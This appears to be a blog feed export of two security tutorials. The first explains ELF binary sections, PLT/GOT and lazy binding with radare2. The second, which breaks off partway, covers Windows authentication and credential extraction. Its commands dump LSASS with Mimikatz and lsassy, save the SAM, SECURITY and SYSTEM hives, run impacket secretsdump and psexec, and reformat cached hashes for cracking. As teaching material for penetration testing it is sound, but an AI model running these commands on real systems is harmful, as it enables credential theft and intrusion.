Through this chapter, I will guide you through the anatomy of ELF binaries, exploring their sections, segments, memory management, and how they seamlessly integrate with dynamic libraries. Whether you are a seasoned programmer, an aspiring cybersecurity expert, or a newcomer to this field, my insights are crafted to enhance your understanding of how Linux programs operate and how to secure them effectively.

Join me as I continue this fascinating journey, connecting the knowledge from previous articles to provide a richer, more integrated understanding of Linux binary exploitation. This exploration is not just an academic exercise; it&apos;s a practical guide filled with the knowledge essential for navigating the modern landscape of computing. Let&apos;s dive in and uncover the secrets of ELF binaries together, as I share my learnings and discoveries in this captivating chapter of the Linux Binary Exploitation series.

# **Unveiling the Secrets of Binaries: Disassembly and Decompilation**

As we navigate through the realm of ELF binaries, it&apos;s essential to familiarize ourselves with the concepts of disassembly and the captivating world of decompilation. While we won&apos;t delve too deeply into the technicalities of disassembly just yet, let&apos;s explore its essence.

Picture disassembly as a kind of magic that transforms cryptic machine code—those baffling strings of 1s and 0s—into a more understandable form of assembly language. It&apos;s akin to peeling back the layers of a binary file, offering a glimpse into its core, almost like peering into the soul of the binary. This understanding is crucial, especially when tackling exploits and vulnerabilities.

Now, you might wonder, &quot;Is it possible to reverse-engineer machine code back into high-level languages like C or C++?&quot; It&apos;s an intriguing thought, but the reality is a bit more complex. The original code morphs significantly during compilation as it&apos;s optimized for performance and efficiency. Therefore, a perfect reverse-engineering to its original state is often unfeasible.

However, there&apos;s a ray of hope: decompilers. These are the unsung heroes of reverse engineering, capable of translating machine code into pseudocode that bears a strong resemblance to C/C++. While we&apos;re not diving into the deep end with these tools just yet, it&apos;s important to know they&apos;re part of our arsenal. So, get ready for an exciting exploration into the world of ELF binaries!

![](/content/images/2023/03/disvsdecom.png)

Disassembly and decompilation sample

# **Object File vs. Executable File: Unveiling Their Distinctions**

In this section, we embark on an enlightening journey to discern the critical differences between an ELF binary&apos;s object file, created post-compilation, and the executable file, born from the linking phase. This exploration is key to understanding the complexities of function and variable relocation during linking.

## Object Files: A Closer Look

We begin by exploring object files, utilizing the capabilities of radare2. Starting with the command `r2 test.o`, we enter the radare2 environment. Here, we execute a detailed analysis using the `aaa` command, effectively identifying functions and key elements in the file.

```bash
[0x08000040]&gt; aaa
...
[0x08000040]&gt; afl
0x08000040    1     32 sym.main
[0x08000040]&gt;

```

This initial analysis reveals that only the `main` function is identifiable at this stage. Other functions, like `printf`, remain undetected due to the absence of linking phase resolutions.

To delve into the `main` function&apos;s code, we employ the `pdf` command. Notably, radare2 indicates that the string &quot;Hello, world!&quot; resides in the `.rodata` section, highlighting its need for relocation—a direct consequence of the yet-to-be-performed linking phase. The `iz` command can extract strings from the object or executable:

```bash
[0x08000040]&gt; iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000060 0x08000060 13  14   .rodata ascii Hello, world!

```

![](/content/images/2023/03/objfile.png)

Disassembly of object code

In our analysis, we also observe the `puts` function being called—an imported function identified within the file. To confirm this, the `is` command lists the symbols in the file, showing `puts` as `imp.puts` (import puts):

```bash
[0x08000040]&gt; is
[Symbols]

nth paddr      vaddr      bind   type   size lib name
―――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00000000 0x08000000 LOCAL  FILE   0        test.c
2   0x00000040 0x08000040 LOCAL  SECT   0        .text
3   0x00000060 0x08000060 LOCAL  SECT   0        .rodata
4   0x00000040 0x08000040 GLOBAL FUNC   32       main
5   0x00000000 0x08000000 GLOBAL NOTYPE 16       imp.puts

```

## **Executable Files: A Detailed Analysis Post-Linking**

Having explored object files, we now shift our focus to executable files, particularly those generated after the linking phase. This step provides us with a more complete and intricate understanding of the ELF binary.

### Insights into the Executable File

Upon examining an executable, we immediately notice a significant increase in the number of recognized functions compared to the object file. Among these, three functions are of particular interest: `main`, `sym.imp.puts`, and `entry0`. Let&apos;s start with `main`.

Running the command `afl` in radare2, we see a list of functions including `main`

```bash
[0x00401040]&gt; afl
0x00401040    1     37 entry0
0x00401080    4     31 sym.deregister_tm_clones
0x004010b0    4     49 sym.register_tm_clones
0x004010f0    3     32 sym.__do_global_dtors_aux
0x00401120    1      6 sym.frame_dummy
0x00401148    1     13 sym._fini
0x00401070    1      5 loc..annobin_static_reloc.c
0x00401126    1     32 main
0x00401030    1      6 sym.imp.puts
0x00401000    3     27 sym._init

```

In this stage, the analysis reveals more information:

1.  **Relocation of Strings**: The need for string relocation, as seen in object files, no longer exists. Radare2 can now directly locate the memory address of the string &quot;Hello, world!&quot; at `0x402010`.

```bash
[0x00401126]&gt; iz
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002010 0x00402010 13  14   .rodata ascii Hello, world!

```

![](/content/images/2023/03/executablefile.png)

-   **Function Definitions**: The executable now lists `puts` as `sym.imp.puts`, that is, a symbolic reference (`sym`) to an imported function (`imp`). Furthermore, radare2 shows a brief signature for it, such as `int puts(const char *s)`, which aids in analysis.
-   **The `entry0` Function**: Commonly known as `_start` in other tools, `entry0` is a standard function in ELF binaries compiled with gcc. Its primary role is to set up command line arguments and the environment for executing the `main` function. The assembly code for `entry0` typically shows it calling `__libc_start_main`, which then calls `main` with the appropriate arguments.

![](/content/images/2023/03/entry0.png)

entry0 code

# **Sections of a Binary: Foundations for Analyzing ELF Binaries**

Before delving into various exploiting techniques, it&apos;s crucial to understand the last piece of foundational theory relevant to ELF binaries analysis: the sections of a binary. Although more theoretical aspects will be introduced in future articles, the understanding of binary sections is essential for a comprehensive grasp of ELF files and their exploitation.

## Understanding Binary Sections

-   **What Are Sections?**: Sections in a binary are essentially logical divisions of the code and data. They don&apos;t adhere to a specific structure; rather, their structure is determined by their content.
-   **Section Headers**: Each section is described by what is known as a section header. These headers collectively form the section header table. Although we won&apos;t delve deeply into each header part, it&apos;s important to note that their definitions can be found in `/usr/include/elf.h`.

![](/content/images/2023/03/elfheader.png)

Structure of an executable of type ELF

## Role of Sections in a Binary

-   **Linker Assistance**: Sections are primarily designed to aid the linker. This means not all sections are essential for executing the binary in memory. For instance, some symbols or relocations are more geared towards debugging rather than being necessary for runtime.
-   **Segments and Execution**: When a binary is executed, its code and data are organized differently, known as segments. While we won&apos;t cover this concept in detail here, it&apos;s an important aspect to keep in mind.

## Exploring Sections in ELF Files on GNU/Linux

-   **Using radare2 for Section Analysis**: To examine the sections of ELF files, tools like radare2 can be very useful. Commands such as `rabin2 -S test` or `iS` within radare2 can provide detailed information about these sections.
-   **Permissions in Sections**: When analyzing sections, you&apos;ll encounter various permissions:
    -   **Read (`r`)**: Allows reading the contents of the section.
    -   **Write (`w`)**: Indicates whether writing in the section is permissible.
    -   **Execute (`x`)**: Determines if the section&apos;s code can be executed.

![](/content/images/2023/03/sections.png)

Sections of the test executable
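As an illustration of how tools like rabin2 locate the section header table, here is a minimal Python sketch that reads the relevant ELF64 header fields (offsets per the Elf64\_Ehdr definition in `/usr/include/elf.h`):

```python
import struct

# Minimal sketch: read the section header table location from an ELF64
# header (e_shoff at offset 0x28, e_shentsize at 0x3A, e_shnum at 0x3C,
# all little-endian on x86-64).
def section_header_info(header: bytes):
    assert header[:4] == b"\x7fELF", "not an ELF file"
    assert header[4] == 2, "only ELFCLASS64 handled in this sketch"
    e_shoff = struct.unpack_from("<Q", header, 0x28)[0]      # table file offset
    e_shentsize = struct.unpack_from("<H", header, 0x3A)[0]  # bytes per entry
    e_shnum = struct.unpack_from("<H", header, 0x3C)[0]      # number of entries
    return e_shoff, e_shentsize, e_shnum

# Usage against a real binary:
# with open("./test", "rb") as f:
#     print(section_header_info(f.read(64)))
```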

## **Diving into the `.init`, `.fini`, and `.text` Sections of ELF Binaries**

Venturing into the world of ELF binaries, it&apos;s essential to understand the unique roles and characteristics of specific sections like `.init`, `.fini`, and `.text`. These sections are more than just parts of a binary; they are the keystones in understanding how a program functions from start to finish.

### The `.init` and `.fini` Sections: The Bookends of Program Execution

-   **The Role of `.init`**: Think of the `.init` section as the warm-up act before the main performance. This section executes right before the binary&apos;s main code, akin to an object constructor in object-oriented programming. The presence of the `-x` flag here tells us that this part of the code is set to execute.
-   **Understanding `.fini`**: On the flip side, the `.fini` section is like the final bow after a show. It runs after the main program, wrapping things up in a manner similar to an object&apos;s destructor. It&apos;s where the program does its final clean-ups.

### The `.text` Section: Where the Main Action Happens

-   **A Focus on Main Code**: The `.text` section is where the heart of the program beats. It&apos;s the main stage where all the primary actions and operations of the program are performed.
-   **Security in Permissions**: Noticeably, this section is typically marked with `r` (read) and `x` (execute) permissions, but pointedly lacks the `w` (write) permission. This isn&apos;t an oversight; it&apos;s a security measure. Allowing both execute and write permissions would be like leaving the door wide open for attackers.
-   **Analyzing the `.text` Section**: To get under the hood of the `.text` section, we use radare2&apos;s `iS` command to pinpoint its memory address. Then, with the `pD` command, we delve into its content, disassembling it to reveal the intricacies of the program&apos;s code:

```bash
iS
pD &lt;memory address to be dumped&gt; 

```

![](/content/images/2023/03/text.png)

.text section

## **The `.bss`, `.data`, and `.rodata` Sections in ELF Binaries**

When dissecting the structure of ELF binaries, three crucial sections emerge for organizing different types of variables: `.bss`, `.data`, and `.rodata`. Each of these sections plays a distinct role in how variables are stored and managed within an executable.

### Understanding the Different Sections

-   **The `.bss` Section**: This is where all the uninitialized variables reside. If you have variables that are declared but not assigned a value, they find their home here. It’s like a blank canvas waiting for data to be painted on it during runtime.
-   **The `.data` Section**: In contrast, the `.data` section houses initialized variables. These are the variables that are not only declared but also assigned a value. It&apos;s akin to a pre-filled canvas, where certain elements are already defined and set.
-   **The `.rodata` Section**: Standing for &quot;Read-Only Data&quot;, the `.rodata` section is reserved for constant variables. These are the variables that are set once and don&apos;t change throughout the execution. They are the immutable truths of the program.

### Permissions and Security Implications

-   **Write Permissions in `.data` and `.bss`**: Both the `.data` and `.bss` sections are given write permissions, aligning with their roles in storing variables that might change or be initialized during the program&apos;s execution.
-   **Read-Only Nature of `.rodata`**: In contrast, the `.rodata` section is read-only. This makes sense as it contains constants - values that should remain unchanged and protected from modification.

### Practical Example: &quot;Hello World!&quot;

In the context of our ongoing ELF binary analysis, the string &quot;Hello World!&quot; is a constant. Therefore, we find it in the `.rodata` section. It&apos;s a classic example of how constant data, like strings displayed to the user, are stored in a protected, read-only section to ensure they remain unaltered throughout the program&apos;s operation.

![](/content/images/2023/03/rodata.png)

.rodata section
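Deciding which section an address belongs to, and whether it is writable, is just a range lookup over the section table; a small Python sketch with illustrative addresses (not taken from the real binary):

```python
# Sketch: given a section table (as reported by rabin2 -S), find which
# section an address falls in and whether it is writable. Values below
# are illustrative, not from a real binary.
SECTIONS = [
    # (name, vaddr, size, perms)
    (".text",   0x401000, 0x200, "r-x"),
    (".rodata", 0x402000, 0x100, "r--"),
    (".data",   0x404000, 0x10,  "rw-"),
    (".bss",    0x404010, 0x20,  "rw-"),
]

def section_of(addr):
    for name, start, size, perms in SECTIONS:
        if start <= addr < start + size:
            return name, "w" in perms
    return None, False

# A constant string would land in read-only .rodata:
print(section_of(0x402010))  # ('.rodata', False)
```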

# **Navigating the World of Lazy Binding, PLT, and GOT in ELF Binaries**

Welcome to the intriguing world of ELF binaries, where the integration of dynamic libraries during a program&apos;s run time is a ballet of efficiency and optimization. Here, we&apos;re going to unravel the mysteries of lazy binding, the Procedure Linkage Table (PLT), and the Global Offset Table (GOT) - three protagonists in this fascinating process.

## Lazy Binding: An Overview

-   **Dynamic Linking with Lazy Binding**: Although dynamic library relocations happen when an executable is loaded into memory, they are not fully resolved immediately. Instead, the relocations occur &quot;lazily&quot; - only when a function call is made or a variable from a dynamic library is used. This approach, known as lazy binding, optimizes performance by avoiding unnecessary relocations and is the default method used by dynamic linkers today.
-   **Utilizing PLT and GOT**: Lazy binding is facilitated by two main sections - the Procedure Linkage Table (.plt) and the Global Offset Table (.got).

## Understanding PLT and GOT

-   **Procedure Linkage Table (PLT)**: This section contains entries for each function that requires dynamic linking. An entry in the PLT typically includes:
    1.  A jump to the corresponding entry in the GOT.
    2.  The function&apos;s identifier placed on the stack.
    3.  A jump to the dynamic linker&apos;s default stub.
-   **Analyzing PLT**: To view the .plt section, commands like `iS` to show sections and `pD &lt;address&gt;` to display content can be used, similar to analyzing the .text section.
-   **Global Offset Table (GOT)**: The GOT holds memory addresses where dynamically linked functions will be placed. Initially, these addresses point back to the PLT, due to the lazy binding process not being complete.

![](/content/images/2023/03/plt.png)

.plt section

![](/content/images/2023/03/got.png)

Jump address in .got.plt

### The Lazy Binding Ballet

![](/content/images/2023/03/putsplt.png)

Dynamic linking process

1.  **The Function Call**: Let&apos;s say our program calls `puts`. This triggers the sequence in the PLT.
2.  **PLT-GOT Tango**: The PLT then gracefully jumps to the GOT entry, which for now, loops back to the PLT, ensuring the function identifier is noted.
3.  **The Dynamic Linker&apos;s Cue**: Next, we leap to the default stub, a preparatory step before the main performance by the dynamic linker.
4.  **The Final Performance**: The dynamic linker takes center stage, modifying the GOT to directly point to `puts`, streamlining all future calls.
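The four steps above can be modeled in a few lines: a toy Python simulation in which every GOT slot starts out pointing at the resolver, and the first call patches the slot so later calls go direct.

```python
# Toy model of lazy binding: the GOT slot is unresolved until the first
# call, when the resolver patches it to point at the real function.
RESOLUTIONS = 0

def real_puts(s):
    print(s)

def resolver(name):
    """Stand-in for the dynamic linker's stub: look up the symbol,
    patch the GOT entry, then return the real function."""
    global RESOLUTIONS
    RESOLUTIONS += 1
    GOT[name] = real_puts      # patch: future calls skip the resolver
    return GOT[name]

GOT = {"puts": None}           # unresolved slot

def call_plt(name, *args):
    target = GOT[name] or resolver(name)
    return target(*args)

call_plt("puts", "Hello, world!")  # first call: resolver runs, GOT patched
call_plt("puts", "Hello, again!")  # later calls: direct through the GOT
print(RESOLUTIONS)                 # resolver ran exactly once
```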

### GOT vs. GOT.plt: The Two Arenas

-   **GOT.plt for Functions**: The .got.plt is where the magic happens for function references. It&apos;s dedicated to making sure function calls from shared libraries hit their mark.
-   **GOT for Variables**: The .got, on the other hand, is like a storage unit for variables or constants from shared libraries, bypassing the more complex dance steps needed for functions.

# **Conclusion: Navigating the Depths of ELF Binaries**

As we conclude our exploration of ELF binaries, we find ourselves having journeyed through a landscape rich in complexity and sophistication. From dissecting the very essence of disassembly and decompilation to demystifying the intricacies of sections like `.text`, `.init`, `.fini`, and others, we&apos;ve unraveled the fundamental components that constitute these binaries. We&apos;ve seen how they are meticulously structured, how they cleverly manage memory, and how dynamic libraries intertwine seamlessly with the program&apos;s execution through mechanisms like lazy binding, PLT, and GOT.

This excursion into the world of ELF binaries isn&apos;t just an academic exercise; it&apos;s a deep dive into the underpinnings of how software operates at its core. By understanding these elements, we&apos;re not just reading code; we&apos;re interpreting the language of the machine. We gain insights into the subtleties of how programs are executed, how they interact with the operating system, and how vulnerabilities can emerge and be exploited.

The knowledge of ELF binaries is invaluable for developers, security researchers, and anyone fascinated by the inner workings of software. It empowers us to write more efficient and secure code, to analyze and understand existing software at a granular level, and to think creatively about problem-solving in the realm of computing.

In essence, the journey through ELF binaries is a journey through the heart of computing, offering a foundational understanding that is both powerful and indispensable in the rapidly evolving landscape of technology. As we continue to build and secure the digital world, the insights gained here will undoubtedly serve as a guiding light, illuminating the path forward in the ever-expanding domain of software development and cybersecurity.</content:encoded><author>Ruben Santos</author></item><item><title>Windows Authentication Deep Dive: Unveiling Protocols, Credential Storage, and Extraction Techniques</title><link>https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems</guid><description>This chapter explores Windows authentication, SSO, and credential extraction. It covers protocols like Kerberos, NTLM, and Mimikatz for retrieving credentials. LSA and SAM play vital roles, and PowerShell history can reveal digital footprints. LaZagne is a tool for credential recovery.</description><pubDate>Fri, 03 Mar 2023 11:15:20 GMT</pubDate><content:encoded># **Introduction**

In this next chapter of our exploration into Active Directory security, we turn our focus to a cornerstone of safeguarding Windows systems: the authentication process. Here, in the complex web of digital security, we&apos;ll navigate the intricate protocols that stand as guardians at the gates of access and control.

Our journey will lead us through the diverse pathways of authentication methods, each a vital piece in the puzzle of network security. We&apos;ll delve into the secrets of how these protocols operate, and more intriguingly, where the keys to the kingdom - user credentials and secrets - are stored and protected.

As we continue to unravel the mysteries of Active Directory security, this chapter promises to illuminate the inner workings of Windows authentication, offering insights and knowledge crucial for understanding the sophisticated world of digital defense and access control.

# **Windows Logon: The Gateway to Digital Access**

In the world of Windows, stepping into your digital workspace is like passing through a high-security checkpoint. This is where Windows Logon comes into play, a critical process ensuring that only the right people get the keys to the kingdom. Whether it&apos;s accessing local files or diving into network resources, Windows demands that everyone shows their digital ID.

Let&apos;s break down this process. Imagine the Windows logon as a vigilant gatekeeper. The most familiar face of this gatekeeper is the &quot;Windows login&quot; screen, where you punch in your credentials – these could be your domain or local credentials, akin to showing your ID card at the entrance.

Then, there&apos;s the network login. Think of this as the second layer of security, happening behind the scenes after you&apos;ve already passed the first checkpoint. It&apos;s like a backstage pass, ensuring you have the right privileges to access specific network resources, like that coveted shared folder in Active Directory. Windows, being the versatile guard that it is, employs various authentication mechanisms for this, such as Kerberos and NTLM.

But wait, there&apos;s more! Windows logon isn&apos;t just about typing in passwords. In the high-tech world of today, it embraces other methods like smart cards or biometrics – it&apos;s like using a fingerprint or a special passcard to prove you&apos;re the real deal.

In essence, Windows logon is your personal bouncer, making sure that your digital space is accessed only by those who are authorized, keeping your digital assets safe and sound.

# **Authentication: The Art of Digital Identity Verification**

In the intricate ballet of digital security, Windows doesn&apos;t just dance; it orchestrates a complex routine of authentication and authorization. It&apos;s like a vigilant gatekeeper, constantly ensuring that every user is who they claim to be and has the right access pass to the digital resources they seek. But have you ever wondered why Windows doesn&apos;t pester us for credentials every single time? The answer lies in a nifty feature known as &quot;Single Sign-On&quot; (SSO).

SSO is like a VIP pass in the digital world. Once you&apos;re in, you can freely roam without being stopped at every door. This seamless experience, however, opens up avenues for various cybersecurity exploits, which we&apos;ll delve into more deeply later in this series. The process usually followed when you want to access a resource is as follows:

![](/content/images/2023/02/winlogon-1-.png)

High level authentication on Windows systems

Now, let&apos;s zoom in on the typical authentication scheme in Windows. Imagine a high-tech concierge, known as the Security Support Provider Interface (SSPI). This API is like a master of ceremonies in the authentication ballroom, pairing up requests with the appropriate security dance partners without needing to specify the dance style upfront. It&apos;s all about finding the right rhythm between the request and the security protocol.

Since Windows 2000, Kerberos has been the leading dance style in this ballroom. But SSPI is flexible; it can sway to the rhythm of either Kerberos or NTLM, depending on the negotiation. These Security Support Providers (SSPs), each with their unique steps, are distributed across Windows machines as DLLs.
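
If you want to see which SSP packages a machine is configured to load into LSASS, the registry keeps the list. This is a quick check from an elevated Windows console (value names can vary slightly between Windows versions):

```bash
reg query &quot;HKLM\SYSTEM\CurrentControlSet\Control\Lsa&quot; /v &quot;Security Packages&quot;
```

This same value is a classic persistence target: an attacker who can write here can register a malicious SSP DLL that LSASS loads at boot.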

## **The Authentication Process: Choosing the Right Dance**

When it comes to accessing network resources, think of the authentication process like a high-stakes dance-off. There are two main strategies for choosing the right dance, or in technical terms, the right authentication protocol.

**1\. Specifying a Single Authentication Protocol:**

This is like a straightforward dance invitation. The client, eager to access a network resource, sends a request. The server then replies with the protocol - the specific dance style it prefers. If the client knows this dance (supports the protocol), they join in, and the authentication process continues smoothly. If not, it&apos;s like stepping on each other&apos;s toes, and the dance - or in this case, the process - comes to an abrupt end.

**2\. Negotiating the Authentication Protocol:**

Now, this is where things get a bit more sophisticated. It&apos;s like choosing a dance style that both partners are comfortable with. This negotiation is orchestrated by the Simple and Protected GSS-API Negotiation Mechanism (SPNEGO) protocol, implemented by the Negotiate SSP.

![](/content/images/2023/03/protocolsuc.png)

Authentication process forcing protocol use

Picture the server sending out a list of dances it knows (supported protocols), along with a challenge for its favorite one. For instance, it might send NTLM and Kerberos, with a nudge towards Kerberos. The client then has three moves:

-   If it knows and likes the preferred dance (supports the protocol), the authentication tango continues.
-   If the preferred dance isn&apos;t their style but another one from the list is, they suggest it, and the process goes on.
-   If the client doesn&apos;t know any of the dances (supports none of the protocols), it&apos;s a no-go, and the authentication process stumbles and falls.
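
The three moves above can be sketched as a toy shell function. This is only an illustrative model of the decision logic, not the real SPNEGO wire protocol, and the `negotiate` helper is invented for the example:

```bash
# Toy model of the negotiation decision logic, not real SPNEGO.
negotiate() {
  preferred="$1"; offered="$2"; supported="$3"
  # Move 1: the client supports the server preferred protocol
  case " $supported " in *" $preferred "*) echo "$preferred"; return;; esac
  # Move 2: fall back to another protocol from the server list
  for proto in $offered; do
    case " $supported " in *" $proto "*) echo "$proto"; return;; esac
  done
  # Move 3: no common protocol, authentication fails
  echo "none"
}

negotiate Kerberos "Kerberos NTLM" "NTLM"   # prints NTLM
```

Swap the third argument to see the other two outcomes: a client that supports Kerberos gets the preferred protocol, and a client that supports nothing on the list gets `none`.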

Navigating this dance of protocols is essential for smooth access to network resources, ensuring that both parties are in sync and the right levels of security are maintained.

![](/content/images/2023/03/listanegociar.png)

Authentication process suggesting lists of protocols

## **Single Sign-On (SSO): The Convenience and Challenge**

Imagine walking into a high-security building and having to flash your ID badge at every door. Pretty cumbersome, right? Windows, understanding this hassle, offers a sleek solution known as Single Sign-On (SSO). SSO is like having a VIP pass that gets you through all the doors with just one show of your badge.

How does Windows pull off this trick? It tucks your credentials into a digital vault called the Local Security Authority (LSA). Like a skilled magician hiding a rabbit in a hat, Windows stores your login details in memory, allowing you seamless access to various network resources without the constant nagging for passwords.

But here&apos;s the twist in the tale: this very feature, while convenient, opens a Pandora&apos;s box of vulnerabilities. Tools like Mimikatz, which are akin to digital lockpicks, exploit this to extract hashes and plain text credentials from the LSA. It&apos;s a reminder that in the world of cybersecurity, convenience often walks hand-in-hand with caution.

As we navigate through the realm of Windows security, SSO stands out as a double-edged sword - a symbol of both seamless user experience and a potential security challenge.

## **Local Security Authority (LSA): The Guardian of Windows Security**

Welcome to the world of the Local Security Authority (LSA), a crucial subsystem in Windows that acts like a vigilant guardian of user authentication. The LSA isn&apos;t just a gatekeeper; it&apos;s more like a multitasking security chief, overseeing a range of critical tasks to keep your digital fortress secure.

**LSA&apos;s Key Roles:**

-   **Policymaker**: LSA manages the security policies of the system. Imagine it setting the rules of the game, like password policies and user permissions - it&apos;s the architect of the digital security blueprint.
-   **Token Generator**: Every time you need access, LSA creates an access token, a special pass that says, &quot;Yes, this person is who they claim to be.&quot;
-   **Authentication Provider**: It&apos;s the one-stop-shop for all things authentication, ensuring every login attempt is legit.
-   **Audit Policy Administrator**: LSA also keeps an eye on compliance, making sure audit policies are up to the mark.

**LSA&apos;s Authentication Strategies:**

-   **Local Verification**: If you&apos;re logging into the local machine, LSA checks your credentials against the Security Accounts Manager (SAM) database - think of it as checking your ID at a local club.
-   **Domain Verification**: For domain access, LSA consults the Domain Controller, using the NTDS to verify your credentials, akin to an international visa verification process.

## **Local Security Authority Subsystem Service (LSASS)**

Now, meet LSASS, a process that&apos;s like LSA&apos;s right-hand man, handling a variety of security tasks, from applying policies to changing passwords. But its standout role? User authentication. LSASS steps into the spotlight during Windows logon, caching a user&apos;s credentials for SSO. This means every time you need network access, LSASS has your credentials ready to go.

In LSASS&apos;s cache, you&apos;ll find an assortment of credentials:

-   **Kerberos Tickets**: Your all-access passes in the realm of Windows.
-   **NT and LM Hashes**: Encrypted keys to your digital identity.
-   **Plain Text Credentials**: The raw, unencrypted keys - handle with utmost care!

In essence, LSA and LSASS work together like a well-oiled machine, keeping the Windows security ecosystem robust, responsive, and reliable.

# Secrets

## **Unveiling Secrets: The Craft of LSASS Credential Extraction**

In the intricate world of Windows security, extracting credentials from the Local Security Authority Subsystem Service (LSASS) is like a covert mission for digital secrets. Enter Mimikatz, the master key in this quest, renowned for its ability to unlock the vaults of LSASS.

### **Getting the Right Privileges**

To start this mission, one must hold the &apos;SeDebugPrivilege&apos; privilege, typically reserved for the system&apos;s administrators. Imagine this as an exclusive pass to the backstage of Windows security. Even for administrators, though, the privilege sits in the token disabled by default. Here&apos;s where Mimikatz steps in with its command `privilege::debug`, flipping the switch to enable it.

### **Commands for Credential Extraction**

-   **Sekurlsa::logonpasswords**: This is your go-to for extracting NT hashes and passwords. It&apos;s like finding the secret codes to every locked door.
-   **Sekurlsa::ekeys**: Need Kerberos keys? This command is your digital locksmith.
-   **Sekurlsa::tickets**: For retrieving Kerberos tickets stored on the machine, think of it as collecting VIP passes to the digital kingdom.
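
A typical session chains the privilege step with an extraction command. The transcript below is abbreviated; the `Privilege &apos;20&apos; OK` line confirms SeDebugPrivilege was enabled:

```
mimikatz # privilege::debug
Privilege &apos;20&apos; OK

mimikatz # sekurlsa::logonpasswords
```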

![](/content/images/2023/03/Pasted-image-20230215152927.png)

LSASS dump with Mimikatz

### **Remote Credential Extraction**

But what if the mission calls for a remote operation? That&apos;s where lsassy enters the scene. This tool, with its versatility, allows for different approaches to extract credentials, making it possible to choose methods that attract less attention – a critical factor in covert operations.
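
A basic lsassy run follows the familiar domain/user/password pattern (placeholders to fill in with your own values):

```bash
lsassy -d &lt;domain&gt; -u &lt;adminuser&gt; -p &lt;password&gt; &lt;ip&gt;
```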

![](/content/images/2023/03/Pasted-image-20230214083039.png)

LSASS credentials dump with lsassy

Mimikatz and lsassy don’t just reveal passwords and keys; they uncover the hidden layers of security, reminding us of the ongoing cat-and-mouse game in digital security landscapes.

## **Registry Credentials: The Hidden Keys in Windows**

In the labyrinth of Windows security, certain credentials are like hidden gems tucked away in the registry. These are the keys that keep the wheels of Windows turning smoothly, and they&apos;re the focus of our exploration in this section.

**LSA Credentials: The Encrypted Trove**

The Local Security Authority (LSA) secrets, stored securely on disk in an encrypted form, are a treasure trove of critical data. Let&apos;s take a peek into what these secrets hold:

-   **Cached Domain Logon Credentials**: These are the digital ID cards that let domain users log on even when the Domain Controller plays hide and seek on the network. Stored in the MSCACHEV2/MSCASH format, they&apos;re like complex puzzles that tools like hashcat can solve.
-   **Service Account Passwords**: To let a process act on a user&apos;s behalf, Windows stores these passwords, acting like backstage passes for various services.
-   **Auto-Login Credentials**: If auto-login is your thing, then these passwords might be in the LSA secrets. Alternatively, they might be hanging out under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`, right next to the DefaultUserName key.
-   **Domain Computer Account Passwords**: These change every 30 days – think of them as monthly password makeovers for security.
-   **DPAPI Master Keys**: The skeleton keys for decrypting user data, shrouded in layers of secrecy.
-   And there&apos;s more – from IIS application passwords to Microsoft accounts, it&apos;s a diverse collection.

This precious data resides in the SECURITY hive file, encrypted like a digital Fort Knox. To unlock it, you need the BootKey/SysKey, which, as we explored in Chapter 2, is found in the SYSTEM hive file. Getting to this treasure requires system-level access, and the right tools, like impacket-psexec for the tech-savvy adventurers:

```bash
# Get a SYSTEM shell on the target, then enumerate the stored LSA secrets keys
impacket-psexec &lt;adminuser&gt;@&lt;ip&gt;
reg query HKLM\SECURITY\Policy\Secrets

```

![](/content/images/2023/03/secretsRegistry.png)

LSA credentials

### **SAM: The Keeper of Local Secrets**

Dive into the SAM (Security Accounts Manager) hive file in Windows, and you&apos;ll find a vault of credentials, specifically the NT hashes of local users. It&apos;s like a secret diary of the system, holding the essence of local user identities.

**Retrieving SAM Credentials Remotely**

To access this vault from afar, one can employ the tool &apos;secretsdump&apos;. It&apos;s like having a remote control to unlock these secrets:
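
A typical invocation follows Impacket&apos;s usual target syntax (placeholders to fill in with your own values):

```bash
impacket-secretsdump &lt;domain&gt;/&lt;adminuser&gt;:&lt;password&gt;@&lt;ip&gt;
```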

![](/content/images/2023/03/sam.png)

SAM database dump

### **Dumping Registry Credentials with Mimikatz**

But what if you&apos;re more of a hands-on explorer? Mimikatz is your tool of choice. First, you’d need to invoke `privilege::debug` to gain the necessary access. Then, a treasure trove of commands awaits:

-   `lsadump::secrets`: This is your key to the LSA secrets.
-   `lsadump::cache`: For those cached domain logons, think of it as peeking into a hidden stash.
-   `lsadump::sam`: This fetches the local account credentials, bringing the guarded secrets of SAM to light.

![](/content/images/2023/03/mimikatzlsadump.png)

LSA dump with Mimikatz

**Local Extraction via Registry Files**

Alternatively, for a more stealthy approach, you can save the hive files and then extract the credentials using tools like secretsdump. This method mirrors the approach we explored for dumping the NTDS:

```bash
# Save the hives of interest for offline extraction (requires admin rights)
reg save HKLM\SYSTEM system.bin
reg save HKLM\SECURITY security.bin
reg save HKLM\SAM sam.bin

```

![](/content/images/2023/03/Pasted-image-20230217084049.png)

Saving hive files of interest

With the files in hand, run the secretsdump tool:

```bash
impacket-secretsdump -system system.bin -security security.bin -sam sam.bin LOCAL

```

![](/content/images/2023/03/secretsdumpexplained.png)

Dumping of registry credentials secrets with secretsdump

**The Revealed Secrets:**

What secrets will you uncover?

-   Credentials from SAM in LM:NT format.
-   Domain user credentials cached in MSCACHEV2/MSCASH format. To crack these, they need to be reformatted: `$DCC2$10240#username#hash`.
-   The machine password (Machine ACC), a blend of hexadecimal and LM:NT formats.
-   DPAPI\_SYSTEM keys and NL$KM, the latter used to decrypt cached domain credentials.
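
As a quick illustration of that reformatting, here is a small shell sketch. The username and hash values are placeholders invented for the example, and 10240 is the default iteration count expected by hashcat mode 2100:

```bash
# Hypothetical helper: wrap a dumped MSCACHEv2 hash into the hashcat
# mode 2100 input line. Username and hash below are placeholders.
username=administrator
mscache_hash=0123456789abcdef0123456789abcdef
printf '$DCC2$10240#%s#%s\n' "$username" "$mscache_hash"
# prints $DCC2$10240#administrator#0123456789abcdef0123456789abcdef
```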

**Extra Tip:** For those curious about which user is running a particular service, PowerShell comes to the rescue:

```powershell
PS C:\&gt; Get-WmiObject win32_service -Filter &quot;name=&apos;mysql&apos;&quot; | select -ExpandProperty startname

```

### **PowerShell History: Unearthing Digital Footprints**

